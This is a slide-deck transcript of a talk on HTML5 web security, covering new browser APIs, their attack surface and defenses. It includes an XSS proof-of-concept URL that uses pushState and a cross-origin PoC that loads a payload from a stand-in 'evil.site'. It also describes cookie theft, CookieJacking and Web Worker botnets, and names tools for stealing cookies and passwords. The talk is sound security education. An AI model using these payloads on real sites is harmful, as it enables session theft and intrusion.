Talk about html5 security

Transcript

1. youstar@insight-labs

2.  Introduction to HTML5  HTML5 threat model  Vulnerabilities

   & Defense  Tools  Reference

3.  History  HTML1.0——1993.6 Not Standard  HTML 2.0——1995.11 RFC

   1866  HTML 3.2——1996.1.14 W3C Recommended Standard  HTML 4.0——1997.12.18 W3C Recommended Standard  HTML 4.01——1999.12.24 W3C Recommended Standard  XHTML——2000.1.20 W3C Recommended Standard  HTML5——2008 First Draft Standard  2012 W3C Candidate Recommendation

4.  Features  The three aspects of HTML5 ▪ Content

   HTML ▪ New Tags and Attributes ▪ Presentation of content CSS ▪ Interaction with content JavaScript ▪ Add New API Drag LocalStorage WebWorkers etc

5.  Features

6. None
7. None

8.  XSS abuse with tags and attributes  Hiding URL

   Code  Stealing from the storage  Injecting and Exploiting WebSQL  ClickJacking &&CookieJacking  Cross Origin Request and postMessage  Client‐side File Includes  Botnet and widgets

9.  In:  New tags: <button>,<video>,<audio>,<article>,<footer>,<nav>  New attributes for

   tags: autocomplete, autofocus, pattern(yes,regex) for input  New media events  New <canvas> tag for 2D rendering  New form controls for date and time  Geolocation  New selectors  Client-side storage including localStorage, sessionStorage, and WebSQL  Out:  Presentation elements such a <font>, <center>  Presentation attributes including align, border  <frame>,<frameset>  <applet>  Old special effects: <marquee>,<bgsound>  <noscript>

10.  Attack:  New XSS Vector  Bypass Black-list Filter

     Defense:  Add new tags to Black-list  Change Regex
11. None

12.  DOM  window.history.back();  window.history.forward();  window.history.go();  HTML5

     history.pushState() ▪ history.pushState(state object,title,URL);  history.replaceState() ▪ The same with pushState,but modifies the current history entry.

13. http://127.0.0.1/html5/poc/history/xsspoc.php?xss=< script>history.pushState({},'',location.href.split("?"). shift());document.write(1)</script> http://127.0.0.1/html5/poc/history/xsspoc.php

14. None

15.  Type  LocalStorage：for long-term storage  SessionStorage：for the session

    application(last when the browser closed)  Differences  Cookies：4k  LocalStorage/ SessionStorage：depends on browser(usually 5MB)  Support  Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50
16. None

17.  Function  (localStorage | sessionStorage).setItem()  (localStorage | sessionStorage).getItem()

     (localStorage | sessionStorage).deleteItem()  (localStorage | sessionStorage).clear()

18.  Attack  Get the data from the storage(cookie,passwd,etc) 

    Storage your xss shellcode  Unlimit the path  Defense  Don’t store sensitive data in local storage  Don't use local storage for session identifiers  Stick with cookies and use the HTTPOnly and Secure flags
19. None

20.  Database Storage  The same as the Google Gears

     Operate  openDatabase("Database Name", "Database Version", "Database Description", "Estimated Size");  transaction("YOUR SQL STATEMENT HERE");  executeSql();  Type  SQLite (support by WebKit)

21.  Attack  Store shellcode  SQL inject  Defense

     Strick with the sql operate  Encode the sql result before display  Don’t store sensitive data

22.  Store shellcode

23.  SQL Injection  Use sqlite_master ▪ SELECT name FROM

    sqlite_master WHERE type='table' ▪ SELECT sql FROM sqlite_master WHERE name='table_name' ▪ SELECT sqlite_version()  Select with ? ▪ executeSql("SELECT name FROM stud WHERE id=" + input_id); False ▪ executeSql("SELECT name FROM stud WHERE id=?", [input_id]); True

24.  Drag and drop basics  Drag Data  the

    drag feedback image  drag effects  Drag events:  dragstart  dragenter  dragover  dragleave  drag  drop  dragend
25. None

26.  ClickJacking  XSS + Drag

27. None

28.  CookieJacking  Use many technology to steal user’s local

    cookies  Technology  How to read the local fileiframe+file://  How to detect the state of cookies Clickjacking  How to send cookiesSMB
29. None

30.  Defense  Use iframe with sandbox  If (top

    !== window) top.location= window.location.href;  if (top!=self) top.location.href=self.location.href

31.  postMessage  Send ▪ otherWindow.postMessage(message, targetOrigin);  Receive window.addEventListener("message",

    receiveMessage, false); function receiveMessage(event) { if (event.origin !== "http://example.org:8080") return; // ... }
32. None

33.  Defense  Check the postMessage origin  Don’t use

    innerHTML ▪ Element.innerHTML=e.data;//danger ▪ Element.textContent=e.data;//safe  Don’t use Eval to deal with the mesage

34.  Cross-Origin Resource Sharing ▪ Originally Ajax calls were subject

    to Same Origin Policy ▪ Site A cannot make XMLHttpRequests to Site B ▪ HTML5 makes it possible to make these cross domain calls ▪ Site ASite B(Response must include a header) ▪ Access-Control-Allow-Origin: Site A Must ▪ Access-Control-Allow-Credentials: true | false ▪ Access-Control-Expose-Headers: ▪ etc
35. None
36. None

37.  Defense  Don’t set this: Access-Control-Allow-Origin: * ▪ （Flash

    crossdomain.xml ）  Prevent DDOS ▪ if(origin=="Site A"){header(Access-Control-Allow- Origin:Site A)……//process request}

38.  Code like this: <html><body><script> x = new XMLHttpRequest(); x.open("GET",location.hash.substring(1));

    x.onreadystatechange=function(){if(x.readyState==4){ document.getElementById("main").innerHTML=x.responseText;}} x.send(); </script> <div id=“main”></div> </body></html>  POC  Introducing Cross Origin Requests http://example.com/#http://evil.site/payload.php  VContents of ‘payload.php’ will be included as HTML within <div id=“main”></div>  New type of XSS!!
39. None

40.  Web Workers  running scripts in the background independently

     Very simple var w = new Worker("some_script.js"); w.onmessage = function(e) { // do something }; w.terminate()  Access ▪ XHR,navigator object,application cache,spawn other workers!  Can’t access ▪ DOM,window,document objects

41.  Attack  Botnet ▪ Application‐level DDoS attacks ▪ Email

    Spam ▪ Distributed password cracking  Network Scanning  Guessing User’s Private IP Address ▪ Identify the user’s subnet ▪ Identify the IP address

42.  COR+XSS+Workers=shell of the future

43.  HTML5CSdump  enumeration and extraction techniques described before to

    obtain all the client-side storage relative to a certain domain name  JS-Recon  Port Scans  Network Scans  Detecting private IP address

44.  Imposter  Steal cookies  Set cookies  Steal

    Local Shared Objects  Steal stored passwords from FireFox  etc  Shell of the Future  Reverse Web Shell handler  Bypass anti-session hijacking measures

45.  Ravan  JavaScript based Distributed Computing system  hashing

    algorithms ▪ MD5 ▪ SHA1 ▪ SHA256 ▪ SHA512

46.  HTML5 带来的新安全威胁:xisigr  Attacking with HTML5:lavakumark  Abusing HTML5:Ming

    Chow  HTML5 Web Security:Thomas Röthlisberger  Abusing HTML 5 Structured Client-side Storage:Alberto Trivero  Cookiejacking：Rosario Valotta  http://heideri.ch/jso/#html5  http://www.wooyun.org/bugs/wooyun-2011-02351  http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and- dom-l3-top-10-attacks.html  http://www.html5test.com

47.  http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe. html  http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox  http://code.google.com/intl/zh-CN/apis/gears/api_database.html  http://michael-coates.blogspot.com/2010/07/html5-local-storage- and-xss.html

     http://www.w3.org/TR/access-control/  http://m-austin.com/blog/?p=19  https://developer.mozilla.org/en/  http://www.w3.org/TR/cors/  http://www.andlabs.org/tools/ravan.html  http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/

48.  Contact Me  email:[email protected]  Site:  www.codesec.info 

    www.insight-labs.org